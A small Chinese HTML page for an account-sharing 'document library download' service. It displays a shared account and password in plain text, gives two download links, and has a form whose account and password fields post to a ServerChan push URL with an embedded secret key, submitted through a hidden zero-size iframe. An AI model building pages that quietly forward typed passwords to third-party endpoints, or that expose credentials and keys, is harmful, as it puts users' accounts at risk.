<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <title>文库下载</title>
  <style>
    span{text-align:center;display:block}
	
	input{
                border: 1px solid #ccc;
                padding: 7px 0px;
                border-radius: 3px;
                padding-left:5px;
                -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
                box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
                -webkit-transition: border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;
                -o-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
                transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s
            }
            input:focus{
                    border-color: #66afe9;
                    outline: 0;
                    -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075),0 0 8px rgba(102,175,233,.6);
                    box-shadow: inset 0 1px 1px rgba(0,0,0,.075),0 0 8px rgba(102,175,233,.6)
            }
	
	
	.button {
    background-color: #4CAF50;
    border: none;
    color: white;
    padding: 7px 15px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    cursor: pointer;
	border-radius: 8px;
	font-size: 15px;
    }
	
	
	#send_form{margin-left:340px;}
  </style>


</head>
<body>
  <span style='font-size:20pt;color:red' >
    喵酱提示 账号密码仅限个人共享使用 账号密码禁止外传 <br>欢迎购买账号支持 请在下方输入购买账号密码 通知喵酱<br>账号：973702123  密码：829080
  </span>
    <a href="http://www.blpack.com/3.html">下载地址一</a>
	<a href="http://http://139.224.236.108/">下载地址二</a>


<form role="form" action="http://sc.ftqq.com/SCU47748Te062e4d3732ae49a7baa16473bf95dda5ca370169f462.send" method="post" id="send_form" class="well" target="posthere">
    账号 <input type="text"  id="text1" name="text" placeholder="请输入你的账号" value="">    
	密码 <input type="text" id="text2" name="desp" placeholder="请输入你的账号" value="">
    <button class="button" type="submit" onclick='msg()'>通知喵酱</button>
  	
</form>
<iframe name="posthere" frameborder=0 width=0 height=0></iframe>

<script>
function msg(){
alert("已经通知喵酱 将会稍后展示");
}
</script>
</body>
</html>
